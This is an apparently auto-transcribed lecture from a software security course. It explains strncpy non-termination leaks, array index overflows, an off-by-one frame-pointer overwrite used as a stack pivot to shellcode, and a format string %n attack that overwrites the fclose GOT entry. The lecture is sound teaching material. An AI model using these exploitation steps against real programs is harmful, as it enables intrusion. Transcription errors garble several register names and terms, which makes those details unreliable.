 Thanks for your, thanks for your patience. It was actually, we're not going to get to it today, but I was in the middle of revamping the slides on Rafa's back, so they'll be much more clear. And I was getting so into it technically that somebody had to come and grab me for the last one. I thought I probably would have looked at the time now and like, oh, I'm sorry, I'm sorry. But I'm here, okay. So following up on what we were talking about, right? So I know it's been a whole week since we've actually covered new material, but in that time, I'm sure you've loaded in a lot of information to bring from buffer overflows and those kinds of vulnerabilities. So now we want to talk about, we've been looking at different kinds of things we can overflow, right? When we looked at a classic buffer overflow, what was it that we were trying to overflow? Say VIP, that was our target, right? We looked at jump buffers, so long jump buffers. We saw that we can overwrite those to control the instruction pointer. And so we'll look at some other different types of things we can overflow. So this is a really interesting example that I like. So we have a main program, we have a character array of 512 bytes, two of them are username and a password. We are then going to copy from Rv1 into password 512 bytes, which is good. We're then going to copy 512 bytes from Rv2 into username and then we're going to print out that we're going to do some password stuff and then we return check password on password, where check password has a buffer of 512 bytes. Copies the password that's passed in onto the stack, perform some check, does some cool crazy checks and then print out that it's checking and then returns. Why does this look fine? Because it says N, it has to like check. Because of the string N copy, right? So we learned that string copy fundamentally is not secure, right? So almost any time an attacker controls a second argument to string copy, you can have a vulnerability, right? But here we have a string N copy, right? So our first instinct is, well, hey, there's no problem here, right? There's no string N copy. What else makes it think like there's no problem here? Well, that, there's 512 everywhere, right? We have 512 bytes in my password, in the check password. Each of these arrays is 512 bytes and the string N copy uses 512. So what makes you think that there could be a vulnerability here? The title of the slide, right? Context, you're looking at code in the middle of a lecture here. So, the question comes down to what exactly are the semantics of string N copy? So if we go over, yes. Where do I always wanna look? Man. So man, they demand a whole, okay. So we need to do man, string N copy. Okay, so this gives us all the mandates for all the different things. So you say the string N copy, copies at most length characters from source to destination, right? So one thing we always wanna check is, is the source and destination correct? Because if you mix those up when you're reading it, then you're still looking to cause a problem, right? So, it's source, sorry, destination from source, so we're copying from Rv1 into password so that part's correct. So we continue to read here. He says, if source is less than length characters long, the remainder of destination is filled with zero characters. That's actually interesting, I do not know that. Right, so your name's gonna copy. Let's say if there's 10 characters in Rv1, it's gonna copy 10 characters to the destination and then fill up 502 zeros. They return to the destination, blah, blah, blah. It's not filled in the nature. Oh, perfect, yeah, I can't even understand that. You know, the next sentence and that thing, okay? Okay, otherwise the destination is not terminated. So what does this mean? So, let's think about back to here, right? When we have this string copy, if we pass in 10,000 bytes for Rv1, how many bytes is it gonna copy to the password field? 512, only 512 bytes. But what's the very last byte that 500, and if we're doing zero-based index, after we copy those 10,000, try to copy those 10,000 bytes, what is password bracket at 511 going to be? What's that byte going to be? So let's say I pass in 10,000 a's, then at password bracket 511 will be an a character, and what will be after that? We don't know, right? It's whatever's after it in memory, which could be, I mean, if we assume that the stack looks like it does here, where after a password is username on the stack, then that would be the first byte of username. So then why is that a problem? No null, right? So what happens then when we copy Rv2 onto username? Do we want the same thing? Same problem, right? But where is the first byte of username going to be on the stack? Yeah, right, 512 as an index above password, and there's no null byte from the end of password to the start of username. So the same with the second byte of username and the third byte and the fourth byte. So that, once this executes, when we pass in password here to check password, what's the maximum possible showing like we can have for password? Is it 512? All, it could be more than double, but we can't only control what's after username, so we should at least terminate that. So we can have 512 characters for password plus 511 and then the null byte. So using this fact that string and end copy, even though it seems like it is more secure because it has this terrible default behavior of whatever happens when you pass in exactly the length number of bytes that it does not null terminate, now you're able to create a string for password that is longer than 512 bytes. So this is actually very tricky then. So for string and end copy, what should you be passing in as the end? What was that? Length minus one. Length minus one. You need to always pass in length minus one or you need to manually set the last byte to be null. So, and this could be used, you can use this for all kinds of tricky situations. Like let's say that username that buffer after you was like some hard coded secret key. Or doesn't have to be hard coded, some secret value or secret key, right? If you can then control that buffer underneath it fill it with data with no null termination and then it's added out to you here in this printout statement, now you're able to extract information about what would be above you on the stack. You do it for this, you do it for leak pointers or addresses on the stack, any kind of information that's behind you, you can also try to leak information that way. This is a cool way that you can combine the buffer on the stack if these results are not null terminated. It's kind of this crazy mix of the fact that strings in C are null terminated and the fact that the string and copy function does not add that ending zero. But they can break their custom string copy routine, right? They can have the same style of vulnerability. So overwrite other stuff. So overwrite other stuff on stack, which overwrite? So you're talking about this string copy? Yeah. Or this string copy? What are the maximum number of values that we can change on stack? With the first string and the copy? 512, that's the maximum value we can change. We can only write 512 bytes on the stack because of this parameter here, it's 512. We can't write over, but because now we have two lovers that are right next to each other, we fill the first one out of the 512 bytes that means that the next buffer, if we try to read from the first one, is not null terminated, so it will keep reading values and it will have a maximum size of almost 10.4, 10.3. And even with that, we still can't overwrite anything. We're just essentially making a password buffer bigger, maximum of 10.23, and so when it gets copied onto a buffer of only 512, that's only how to be overwritten. So here we're not actually overwriting anything in the main function. The overwrite happens because the buffer of my password in check password is overflowed and we can control EIP that way. I have money to get it. I think it will probably depend on exactly the implementation of the string copy. So depending on how it does it, it will probably have some weird behavior. But yeah, there's probably a way you can use that to your advantage. Because I think the main advantage is that it's going to explicitly like it's undefined. So that means any libc can do whatever it wants there. I'm sure you can terminate all buffers. This is kind of the coding, but less than learned here. Other types of overflow we can do. So an index overflow takes advantage of that there are no boundary checking at the end of the array. And these are actually going to be very easy to exploit. It depends on how exactly it's done, but you can control the index from a pointer. You can have it go outside that buffer or even below that buffer with the negative values. We talked about what does this is the equivalent of, this is the parent string. Okay. What does this in tactically equivalent to? This is exactly the same thing. So do pointer arithmetic on A, go to 10 whatever elements you're pointing to forward and then do you reference that? There's no reason why it's literally just pointer arithmetic. So you can have A minus 20. You can have a bracket as much as you want. You knew all these things, you could just pointer arithmetic. So for example, let's say we have some array, some index, some value. And so we're reading from RV1, we're turning it into a number. Strings along, so they're converting this string into a long number. We're calling it into index. We're then setting some value as base 16 into value and we set a rate bracket index to be value. All right. So essentially there's two things we use in tactically control. We can control the index variable and we can control the value. So fundamentally, and there's no checking here to say that index must be within eight of the value. Right, so using this, we can directly access any memory that is outside of the array and put it to change it to be any arbitrary value. And so you can see this and we just do Y of 11. Yeah, so it should overflow, say VIP, right? So there should be about eight bytes there. So eight and then four. Is that right? Oh, wait, eight. Yes, okay, yeah. In the next row today, sorry. The drawing picture is a lot easier, a lot easier. And so, of course, now we have to do multiple sets on here, right? We have to get our shellcode somewhere in there that's executable. We didn't change the value that we're trying to do to be the address of that shellcode and we can make sure that index is correct. You can put in huge values here for that index so we can overflow all kinds of stuff. Questions on this? So it's all about thinking about what types of things can be attacked or controlled, right? And from your perspective, you're thinking about what can I control? What kind of influence about that program? Obviously, in a real program, it's not going to be as simple as this, right? Or it's literally reading in your index and the value. But if there's some way, maybe it's reading from a file, right? Maybe it's a file format and it's reading an index into an array from the file and then it's reading in some value that he wants to put there. And so using that, if you pass a negative value, maybe it allows you to go outside the buffer. You gotta always check. I mean, this is kind of the fundamental problem that we've seen, right? Not only when you're copying things, but when you're accessing array elements, if it's ever possible that an attacker can influence what element of the array you are accessing, then there could be more ability there. Loops. So, I don't know about you, but off by one errors are probably some of the things that happen in almost more and so than any of the coding mistakes that I make. You're looping over something and you are doing a less than or equals instead of a less than, right? Because you reason it out in your head and you try it out. Yeah, pretty much works. It's fine. And then five steps down to the road where you used to make a lot of test cases or something, like it doesn't work and you don't really understand why. And that's usually why. And some of you might 345, maybe you can simplify it. So the idea is you're having a loop, so we're gonna loop over all elements in the array from zero to the length of the array and we're gonna set some value, right? So here we're not overriding all, it's not a huge buffer overflow where we can just put arbitrary garbage under the stack and overflow everything. We can only overflow one single byte on a stack, that last byte. And this is gonna actually, even though this seems crazy, right, that even one byte can actually allow us to completely control the program and the EIP. We'll see how this works. So there's actually an infract article about this for any point you're overriding that we'll see. So, idea is we're gonna buffer, we have some in there I, we're gonna loop from I from zero to 256. Yeah, staining in, right? We're gonna come along. And it's better to be doing it at speed, it's a little bit noticeable, but if you're looking at assembly code, it's very difficult to tell, it's like a gem, L, E, Q, instead of LT or something like that. So we're gonna set buffer I equal to SM, so SM is the password that we pass there, or some buffer that character pointer that we pass into this function. And in name, we say we call this function with argue one. That seems crazy. I mean, it's a similar thing to me to the string and poppy things we looked at, right? You see 256, you see 256, right? It seems like this should be fine. And it almost is except this equals right here. So if we think about what does the function do? So I hope by now I already know what an epilogue is, so the epilogue of function, right? And we've been looking at, we know that it's gonna do a leave and then a return, right? Or if we break leave down, it's gonna move EVP, no. Yes. Move EVP into the stack pointer. I have a brief moment about this with the other index. Move EVP into the stack pointer, so move the stack pointer where the current base pointer is, pop that value off the stack onto EVP, and then return. So let's say there's no space on the stack in between, there's no additional padding on the stack. So the stack, the buffer here is 256 bytes below what? Save EVP. So that means that we can change one byte. So here we can actually alter 257 bytes. What is the byte that we're actually gonna be able to override? Save EVP, and not the entire value, only one byte. Which byte is that? The most significant or least significant? Least significant. Least significant because of the crazy end in this. Right, you have to prove that to yourself. So basically we know all this, right? We know the epilogue works. We've done this. So we moved that one, we put the stack, the stack pointer up on the base pointer. We then pop EVP, so we take that same EVP, and we know that this same EVP is gonna be what? Base pointer to calling function. So it should be somewhere in main, right? So we're gonna return up into there. And then main is going to have its epilogue. Right, so we know from the return zero, it's gonna move zero into EX, then it's gonna have its own leave and then return. Right, where it's gonna set the base pointer, the stack pointer to the current base pointer, then it's gonna do a pop EVP, and then it's going to do a return. So the key is, when main key are executed, so we know that there's main, this is wrong. This is function save EVP. There should be save, there should be the buffer of main, and there should be save EVP, save VIP, and then Rc, and Rd. I think this is the whole mess up. So, inside, so think about main, right? So we can change one byte of EVP. And so when main returns, when it's going through its epilogue, what's the first thing that epilogue does? Change the stack pointer to wherever the base pointer is. And because we can control one byte, the least significant byte, we can now make the stack pointer point to somewhere in the range of 256 bytes around that address. And then the next thing that happens is we have a pop EVP, so whatever value is currently there where the stack pointer is pointing, that's where EVP, that will go into EVP, and then the final thing that happens is what? A return, so whatever is on the stack at the stack pointer, that's where it'll go in an execute. So, by controlling the save EVP of one function, when we return back to another function, we can then, it's also called a stack pivot. So essentially we're moving and shifting the stack down a little bit. And so if we put the value that we want on the stack somewhere in that range of where we wanna go, main will think that that's it's saved VIP and we'll jump to it. So that's the essence of what we're trying to do here. So the idea is we know that with the stack, we're gonna copy all the values in there, buffer zero from one all the way up until we get to buffer 256. And because we're talking about characters, we can only influence that last fourth byte of EVP. And so really the goal here is showing you that, this is what we were talking about, VIP is not the only target, we can actually win completely with EVP. So that's what we're gonna see here. And we've done this, we know all about this, is what I'm gonna do when I write a lot of stuff. So the idea is, now what we're gonna do is put our not sled and shellcode just like normal onto the stack. Then we're gonna put the address of the shellcode and we need that to be close to the stack pointer. Then we're gonna overwrite the lowest quarter byte of the frame pointer and we want to be able to shift the stack so that eventually the IP becomes this address of the shellcode. So we can do all this, we've already done all this. So the idea is we're moving here, we have our not sled, we have our shellcode start, we have our shellcode end, then we have this buffer, FF, FFC seven more. So just like a normal stack overflow, we need to have the address we want of the shellcode. So however we're gonna do that, we've already done that before. We need to find the address, some address that's inside the shellcode. And now here, let's say, so here this, the insane EVP is BFFFD5C. Or sorry, is FD something else besides 5C is above 6 zero, so it's gotta be like 6 eight or six, one eight or something like that, right? So this thing that we overwrite this with FD5C, when main returns, it's gonna set its main base pointer to be BFFFD5C. So to main, it thinks that the current EVP is here, which also means if you notice, it means that after this point, any local variable access or any parameter access will be an offset of this value that we just tampered with. So this is how we can also use this to not only corrupt EVP as we'll see in a second, we can use this to trick main into thinking it has different local variables. So if there's a local variable that says we're authenticated or not, we can shift the stack down, or the frame pointer like this, set it to something that we control and now we control those local values. So it's all like a data-oriented exploit that actually, there's tools now that all tools, research and how to do that automatically. But for our purposes, so why is it 5C and not 6 zero? Because 6 zero is where the address in the shell code is. Yes, because the leave instruction is going to set the stack pointer to the current base pointer and then it's gonna do a pop EVP, which is gonna move the stack pointer up four bytes, then it's going to do a return and the stack pointer at that point is pointing to BFFFC74. And so that's gonna go into our shell code and everything's gonna work. So what is one trick that you have to get right here? So before you have to get the address in your shell code, what's the other thing you need to get right here? Yeah, the last byte's here, right? The last four bytes here. How do you do that? You can debug it. What was that? Look at the assembly. Uh, look at the assembly's top because that byte is going to be dependent on the stack, right, like what the actual stack layout is at that point. So you can use GDP. Yeah. Like we have the know-of-slate, we can have the slate at the top with the same address. Very good. So yes, we can actually have a address sled at the top, right, because all we need is wherever we end up putting that frame point or two needs to, the thing above it needs to be an address, right? So we can have 10 addresses there. What's the other thing? So when you guys interview technical interviews, what should be your first instinct when you answer a question? Brute force, the simple, stupid thing. How many tries do you have to brute force here? 256, right? There's only, it's a byte, there's only 256 values that can go there. Just do it 256 times. I don't even need to calculate it or worry about it. As long as everything else is set up correctly and that you're actually within there, it'll work. Use RV, just sort of show it to me. If RV, yes, if RV is within 256 bytes of that, of where the current stack pointer is. And you may have to play games, right, because let's think about this. You can only kind of control the least significant bytes of the stack, right? So let's say the current stack pointer is like VFFFD, where it actually doesn't matter. If your RV is at VFFFFF, you'll never be able to point to it because you can't control those three values. But if it's close enough, right, you can add additional things to your environment or additional RV parameters to move the stack down. As long as you're within 256, you can maybe get it to where the buffer, like the EDP is at VFFFD00 and then your RV is within 256 above that. But couldn't you still set the EIP to point to something in RV? Wait, oh, say that again? So couldn't you still set it? Oh, put the shoutcode there, yes, yes. You still need this point to the shoutcode. Yes, you need your address to the shoutcode. But the trick is you need that address that you control that what you need is VFFFC set four to be within 256 bytes of that EDP value. But yes, you can put your shoutcode wherever you want along with the address is the same. So we can see this, so we can walk through this a little bit. So we're moving the EDP into ESP for function, right? So we're not doing it yet, there's no vulnerability. So we then pop EDP. So now we're putting our Tink to Value into EDP. So now the base pointer points down here of a very last byte, the very last four bytes of the shoutcode, and then when we return, the stack pointer of our number is still in the same place. We haven't changed the stack pointer. So we will go back to the save EIP in main. The main's going to return, and it's gonna do the same thing. So what happens next is exactly what we talked about. So in main's epilogue, we're gonna move the base pointer and the stack pointer, but unlike literally every single time we do this, the stack pointer's gonna move down, right? It's gonna move down to wherever our new EDP is, which is gonna be here. We're gonna pop that into EDP, which is gonna point to some value you actually don't care. And then we're gonna return to the address of the shoutcode, and that's gonna start executing at our shoutcode, and then we're gonna be good at loop one. Yeah, so the address of the shoutcode can definitely be anywhere in execute, we'll know, right? So this actually has two really cool things. So any questions on this? It's a pretty cool technique. It's a nice, but it's very powerful. Yeah. If the poppy 15 is the one you're talking about, it will talk to on the board. Is that it again? The poppy repeat. So one thing to think about is, so remember, I can move, let's say the value zero into register EAS, right? So now there's zeros in EAS. That does not cause a set fault, even though memory zero is not that, right? When does it cause a set fault? When you do it again. When I dereference it, exactly. So as long as wherever I'm going to, never dereferences EVP on time. But yeah, I may have to worry about that, so that could be an issue to hang on where I want to go. But that's specifically why we wrote our shoutcode and such that it doesn't care about what's in those values. So this does two things, that you need to thoroughly check loops, and you need to actually pay the very close attention because even an off by one byte problem could result in complete arbitrary code execution. One other thing that's related to this is if a user can supply how many times you loop, that shows it's bad, right? And off by one more abilities can cause crashes and execution of arbitrary code. We're more interested in the execution of arbitrary code, but a crash should always, I don't know if you've heard of this saying like where there's smoke, there's fire, right? So a crash of a program is a smoke that tells you like, oh man, there's something wrong here and you start digging until you create an exploit and that's the fire, right? Which you can ask the QR to do. Now we get to another cool ability, a formaturing more abilities. So, fundamentally, any time an attacker can control the string that is passed to the first argument of the formaturing function. So it's not always the first argument. Whatever that format string is, that specifies the format, it's possible for an adversary to read any arbitrary memory location and write to any arbitrary memory location. So this type of string is okay. Why is it okay? Exactly, so the printf function, right? The printf function, the first argument is the format string, right? Just like when you use your printing stuff out, you can say you present D to print out integers, present S to print out strings, all kinds of things that present X to print out in packs, right? And so this is fundamentally okay. So because this format string is hard-coded, right? Unless there's some other vulnerability that allows somebody to overwrite and change whatever this is pointing to, which could be possible if that would be pretty complex. This is fundamentally okay. Because here, no matter if the adversary can put whatever they want for name, it doesn't matter, right? It's still not possible for them to control how that format string is parsed. On the other hand, if you're passing in a buffer to printf, where this buffer is controlled by the user, now you have a format string vulnerability. So what if in this case if I printf buff and I have present D, space present D, what's that gonna do? How does printf work? You have to write printf, it's gonna be a good sign, what do you do, yeah? It uses a list of optional arguments at the end. So if you have additional arguments and you have these, it's just going to be above it in the stack group of problems. And what is it doing with this string, this format string argument? What is it? Expecting to link it. How does it know to expect two integers? Parse it. Parse it, it has to parse it when, when you compile it? At run time. So if you look at the printf function, you'll see code that literally loops over and parses this first string so that it can determine how many arguments it should be looking back, right? And so, because fundamentally when printf is called, it does not know how many arguments were passed to it. And so, what printf does is it just, so when it gets executed, the only thing it knows is what is this format string? So it knows that the first argument better be a string that's a format string, then it interprets the type of every other argument and the number based on the content of that string. Right, and we know from our usage of printf when it sees the first percent d, that means print out the next, in this case, the second argument as an integer and the next percent d where we print out the third argument. So how does printf calculate what the second argument is? Yeah, it's on the stack of four bytes above the first argument. And the third argument is four bytes above the stack on the second. Four bytes on the stack above the second argument. Right? It has no idea. It has no way of knowing that this function was only called with one argument. So therefore, it's gonna print out values that are on the stack where those arguments should be. And so this is actually just a trivial way that we can get it to just print out the values of the stack. The cool thing about printf, so, this is another thing that I had to urge you, man page, I know that you know that I was gonna say that. Excuse me. Yeah? So the buffer, instead of mod d, if you put mod s, does that help or does that change any, anything that prints out? It's fine by the side. Think about that. So we have to look at, wait, this is the, really the top, we'll see this is the dash. So the one is like a dash. I think it's, so we can see, and you can see in the function definition all these functions, right? The ellipses in all of these, the dot, dot, dot means it's a, I actually don't know how to pronounce the name. I think it's very happy if it's the name of this function. So it's a c function that can take an arbitrary number of arguments. And so at runtime, the printf function has to parse this to figure out how many arguments were passed. And so if you can control this format, you can do a re-arbitrary code, sorry, re-arbitrary memory or execute arbitrary code. And the reason why is, if you get into, so printf itself is essentially a whole other language. I know it's really easy to think about it's like a percent x, percent d-link, but it is insanely complicated. And we're not gonna get into it, but you can look it up. There's a paper, that group that's actually a terrain complete. So anything you wanna do with printf, like in any language, you can write a printf format string to do. So we can do arbitrary computation. For our purposes, all kinds of modifiers, conversions. Okay, there's a couple things. So we're talking about s. So s is, means a character pointer argument. It's expected to be a pointer to an array of character type. Characters from the array are written up to, but not including a terminating will character. So if we put in a substitute in there for percent d, percent s, what wouldn't happen? Probably a second fault, why? Yes, so, unlike, so percent d, right, prints out the value that's on the stack as an integer, right? Percent s says, take that value on the stack, dereference it. If that thing is not null, print it out. And then add one to it. If that thing's not null, print it out. Add one to that address. So it fundamentally is dereferencing on the stack. That's actually a great and easy way to test if there is a format string vulnerability. Because if you pass in a bunch of percent s's and the thing crashes, you know it's probably have a format string vulnerability because it's crashing and because it's trying to dereference an array that's not obligated. You need to exist to print out stuff that you want. If there's some secret value that's a pointer on the stack, you need to print that out. Yes? On the same note, we had username and password at a string, in the basic salmon. Yes. When you're writing a strncpy of both things, we never fill up the null category. So when we pass the password, it could also cause the same problem. Is there again, when we pass the password in the previous example? Yes. strncpy. Yes. It prints up to a point where it can read a null category. Yes. We're not going to do it in the program as well, because we didn't really use the name on it also with the null. Correct. So in that case, when it's printing out those arrays, it'll print out the 10, 24 characters, and then it'll print out any other characters after that until it gets to a null. So in that case, yeah, we could maybe use that to get leaked other information off the stack. But we'll see if we can just do that directly. We don't actually need that. But it can leak us extra initial memory. OK, so exactly. OK, so other things that pre-definition is going to do, that's crazy. So let's think about this. If we wanted to get, let's say, something that from the first argument was 10 up the stack, right? We have to do, like, percent x. I'm going to use an x, so it'll print out an x, because that's almost too annoying. So like, you've got to do 10% x's, right? If you have a second, third, and fourth fit all the way. There's actually another syntax, or a different type of syntax that you can do. It's called direct accessing elements. It makes sense. If you're writing a print def, if you may want to actually refer to the same thing twice, you may want to say, hey, print out the second argument, and then the first argument, and then the second argument again, and then other things. So I'm only equalizing this one. So part of the forex string specification is, so, yeah, this thing, like I said, is probably good. So there's an optional field consisting of a decimal digit string followed by a dollar sign specifying the next argument to access. If this field is not provided, the argument following the last argument will be accessed. Arguments are never starting at 1. So this means percent 1 dollar sign x will print out the first argument in x. And percent 5 dollar sign x will print out the fifth argument in x. And that's fantastic. So this percent i dollar sign p, because it's not moving the stack up at all, and so we can get any arbitrary offset from the current argument. We can put in arbitrary values here. I don't think you can put a negative value, but you can put a very large value in there. So you can literally, using this, read any memory above the current stack pointer. There's one more thing which is insane. So if you're bored, you should read through this to see all the madness that print out allows. But the one crazy madness is if you think about people adding features to software about thinking about the consequences, some of the use cases of print def are to print out reports. So you need reporting. It needs to be in certain columns and formats and blah, blah, blah, blah, blah. So part of the thing is maybe we want to know how many characters we've written out, not the whole print def string, but at a certain point in the print def string. So let's say we print out the username and password. And now we want to know, well, how many characters did we print out? Because maybe we want to adjust the offset of the terminal and, I don't know, null, appendix, whatever. Whatever you want to do, this crazy addition here. So they said, ah, great. We'll add another directive to print def called n. So a percent n takes in an integer pointer. So they expect there to be an address on the stack. And it will write out to that address how many characters have been output up until that point. Who controls how many characters are print def string outputs? Us, we can control the format string. So we can control the value that's being written by changing how many characters are being output. What's the second thing we can do to control? Well, OK, we'll talk about that in a sec. So as long as we have a pointer on the stack, we can then write whatever we want to that memory location. So fundamentally, the percent n allows us to write whatever we want anywhere in the program. So what kind of values do we want to actually write out? We want to write out essentially the address of the shellcode. Let's say we want to overwrite EIP with the address of a shellcode. But the address of the shellcode is an address. What has all of our stacks started with? Not like bfff, whatever. Do you know what that number is? Yeah, it's like 3 gigabytes. It's like a huge, huge number. So do we want to? And it's all about how many characters we've output. So the number we can write out is how many characters we've output. So do we want to have 3 gigabytes worth of a's just to get up to the correct number that we want to write out? No. Because oftentimes, as we've seen, the buffers that we have aren't that big. The format string that we can input to the program is only about 500 bytes. But we still want to be able to output arbitrarily large addresses. So we can use this other crazy feature of the format string, which is called an optional decimal digit string specified a minimum field width. If the converted value has fewer characters than the field width, it will be padded with spaces on the left. So if we put in, like, percent 65,000x, it's going to print out the first argument on the stack, and it's going to make sure that it outputs 65,000 zeros. So we can really input a small format string, but we can control large values in the output. Now, fundamentally, we still don't want to output. Go there in a second. So this is the percent K and P. So using percent 20 P, we'll say current thing out using P is a pointer, so it does 0x, and then it outputs the x value. And then it will print all that out. So we have percent N, good. So now we have all the building blocks that we need in order to write and read So if we look at a simple vulnerable program, we're opening up some log file. We're calling an ad log with that file, and then we're closing it. And in an ad log file, we are looping over it, and we're reading a line from that file. And we are printing out a loop. We're using fprintf, so we're printing out to f, this value line, which came from read. So the reading function is reading from zero. What's zero? Standard N, if I need to call standard N. So it's reading a line from standard N, and that's where we get that buffer. And so it's taking our input, and it's writing it out to this log file, this file pointer. So if you think, but this looks correct, you got some input, and you're trying to write it out to the log file. But instead of using fwrite, we're using fprintf, which means that this value that we're using for line is going to be interpreted as a format string. And thus, we can pass in, well, here we have to put anything we wanted in that, or we have to give as input anything we wanted, and then we'll interpret that as a format string. So we do cool things. Like, we can print out four a's. So we're going to pass in, as input to this program, four a's, then four b's, then four c's, then four b's. 8% p's. And so remember, this is actually a little bit trickier, because you're not getting the output directly. It's going into this temp log file, so you have to kind of do all this stuff. But, so what is it printing out? So why did it print out four a's, four b's, four c's, and four b's? Does this a, b, c's, and b's are living on the stack? No. Because that's the format string. What was that? It was in your format string. The format string, right? I told it, just like you say printf, hello. It's going to print out hello. So I told it to print out four a's, then four b's, then four c's, then four d's. But it's doing exactly what it says. It's OK, you want an a, an a, an a, an a, a, b, b, c, c, b. Then what is it printing out? So it's interpreting the first element on the stack as what? So the first percent p is going to get what was the first argument to print out. And that's all 41's, right? 41's, 42's, 43's, 44's. And then what's after that? I asked you, Daniel. You guys have a memory of this? The a's, four b's, four c's, four d's. The 41's? Yeah, but what's after that? What's after the 44's? What was that? It said p. Yes, it said p. So 25, I know, is percent. If I'm going to guess it, lower p's, p is 70. So we actually see something interesting. So we see four a's, four b's, four c's, four d's. And that's zero x1. So what is that? x1, where'd it come from? How many percent p's do we do? So what's the first one? Actually, live, I think, five minutes ago. What's the first percent p output? Maybe. But what in this output that we got? So this is the output of print f. So what is the output of the first percent p? Yeah? No, I don't know. I don't think so. It doesn't matter what it is, but in the output, what is it? The first one? That's the zero x1, right? So it's the first thing before the bowl. So this would be the first percent p output zero x1. So whenever it's on the stack, they're actually maybe the standard output. And then above that is zero x4, one, four, one, four, one, which is four a's, and then there's four b's. So this is first b, second b, third, fourth, fifth, sixth, seventh, and eighth. Ooh, that's what I worked out. So when we get to here in the bowl, where is that? So we're on the stack, but what is that that we're printing out? It's our input, it's our format string on the stack. So who controls these values? We do. And with the percent n, what needs, how do we write to an address? Where does that address have to be for us to write to it? Has to be somewhere on the stack. And so we know that the second argument of the stack and the third and the fourth and the fifth are arguments that we control, right? So we can actually put any address we want on there, and then if we put a percent n instead of a percent p, it will write out to that address. It's gonna be involved a lot. So the question then is what to write, right? What to actually write out? So unlike, so we can try to write on the stack, right? So we can try to write the same VIP, or we can try to put some address in some shell code. That's kind of hard, right? We've talked about it, it's, you know, we have to get it exactly right. And unlike a buffer overflow, we can't really just spray a bunch of the address we're trying to hit to try to guess, right? We have to put in exactly which memory location do we want to overwrite as all of those a's, as we'll see in a second. So we can go back to our lovely friend, the global offset table, which has all the addresses of all the dynamically linked functions. So we can bring out, we can bring the relocation table for this format symbol program. And we can see we have a GMON start, Lipsy start name, read, F close, F open, F print F, and exit, right? So these are all big to the program. And the important thing is, the way to read this table is that this left column here says that in memory at location, let's say 080497E4, will be the address of the function exit. And so when we call exit, we're gonna jump to whatever is at that memory address, 080497E4. So what this means is if we, so we can actually look at this. So if we look at the function for F close, we'll see that we're calling 804839C. Sorry, so if we look in the program, when we use object dump, we can see that when I call to F close, it's calling 804839C because this is it's entry in the global offset table. I'm gonna let's hang on to that, I think it's all right. Ah, there we go. Okay, this is the trend only. So this is, so the call to F close is jumping into the PLT, the process linking table, which then gets this 80497D8, which is, let's go back, let's do right. Yes, 80497D8, which is the address source. If we go back and try to read this again, right, it's saying jump, and the dereferences, get whatever is at that memory location, 80497D8, and start executing from there. So it's an indirect jump, right? We're jumping to whatever is located inside of a memory address, and it does other stuff. And so this 80497D8 was in the GOT table. So, and why are we looking at F close? When is F close called in the original program? That's right, so we can't, even if let's say we change some value in the global offset table of like F open, if F open's not called after we do the format string, we're not gonna do anything, right? But we know that F close is gonna be called, right? So we can overwrite the value for F close, then we can change the wave in this program. We can execute, we can get it to execute to our shell code instead of going to F close. So the idea is we know if we can control whatever is at the memory location, D8, I don't know why it's D8. So, what can we do? So we know that it's the second percent P that gets us there, right? And with this, do I have to worry about my environment changing and the stack changing? And I'm not passing any arguments in here, right? It's reading from standard in, so I'm not passing in and changing any of the arguments. Cool. So, I can be a percent two dollar sign P, now I wanna think like a scientist, right? I'm trying to create a hypothesis and I'm trying to say what's this test gonna show me if it's correct and what's this test gonna show me if it's incorrect? So, what do we think this is going to be if this is correct? What am I looking for? What should the output of this be? 41, 441, 0x4141, 4141, 4141. Oh, we got all the a's and all these all the C's and then that part. Okay, so we gotta remember we're gonna see this part of the string is gonna come up this time. And we can, ah, okay. So now, we said we wanna try to overwrite f close. Right? So instead of four a's, what should we have here? Yeah, the address that we want to open up right, we want 080497D8. So what we're going to do is we're going to use slash x08 slash x04 slash x97 slash xD8. Okay, other way we get the vendianess, right? So we want to print out D8970408, then 4Vs for Cs for Ds and then we're set to slash x slash 5x9x. Why can't you just use dollar sign x here? Because the dollar sign x is a batch of variables, so it's apparently the batch is going to get in your way and change that. So now what do we expect to be output here? We should see what? We should see, first we should see garbage, right? Whatever these bytes are, then we should see 4Ds for Cs for Ds and then we should see 080497D8, right? So this is good because this validates that we actually put a memory address in there correctly. This is why I like to operate just like the writing program, right? You start with something small, you're a small function, you test it, make sure that it works, then you write other functions, I call that function, right? I've been trying to sit down and write the whole thing at once, it just never works, right? So here I'm building it up piece by piece. So now if I change that x to an n, what do I expect to have happen? First of all, what is it going to write at 080497D8? Remember so hard about it. It should be, right? 4 bytes, 4 bytes, 4 bytes, 4 bytes, right? And we know that it's not going to, so now the other thing to remember, right, that we're changing this percent x, this to a percent n. So we're not going to see anything, we're going to write out whatever the second address, we're going to write to that address, it should be 16 characters. I don't know if you're going to code it, it could have messed things up, but I'm pretty sure it's going to be 16, so let's see. But what do we expect is going to happen when we run this? It should send fault, when we get the f close, not when we write, right? It should send fault when we get the f close. We see it does this, and then so we can, so apparently I'm missing a set fault, but it should set fault. We can run this in GDV, so we can first get the output file, then we can run GDV on this format string, run it by redirecting the input from test, we'll see that we received a segmentation fault, and it said that there, if you look at the registers, you can see that EIP is x10, which is 16, is that what we want? So now we're able to completely control, right? We can see that from here, because we changed that value in the global offset table, we can redirect the function, sorry, we can redirect the control flow of this function to execute wherever we want. Do we want it to execute at byte 16? No, we want it to be the address on our shell code, right? So, we can see that the field width is, comes to our rescue, so we view percent 200x. That will print out whatever value's on the stack and pad it with 200 spaces, so the total is 200. So, the problem is, let's say our address on our shell code is at ff, ff, ca, f5, which on a system I was running this on, it's the 64-bit system, the 32-bit system, the 64-bit system, we're going to start at vf, we start at all s. So, this would be, the number would be 4,294, 953, 717, which is a total of 4.2 gigabytes. So, do you think about like, well, will this work? Yeah, actually, it will probably work, but literally you're going to cause the file system to write out four gigs of data. Or if you're doing this remotely, to even get a response back, it's going to have to give you four gigs of just spaces, right? I've actually tried to do this before, it didn't kind of work, but it's not great. So, how many bytes are we trying to write? Four bytes, right? We need to control four bytes in the global offset table. So, instead of writing this ff, ff, ca, f5, right, instead of writing it all at once, why don't we split it up into four different writes and just write out a byte at a time? So, we can write out ff, then ff, then ca, then f5, f5. If you remember, we have four different things, four a's, four b's, four c's, and four d's in the format string. So, more man-page stuff. There's actually a way that you can do this. So, there's a modifier you can put, percent h, h to anything, to x, to b. So, h is like, I think it's like a short, short, or something. Saying that you want to output just a character as x. In this case, you want to write to a character pointer, or a signed character. And this way, we'll only write out one single byte. And we're going to address each of these three bytes. So, we know we've already output 16 bytes. And let's say we want to write in this order, ff, ff, 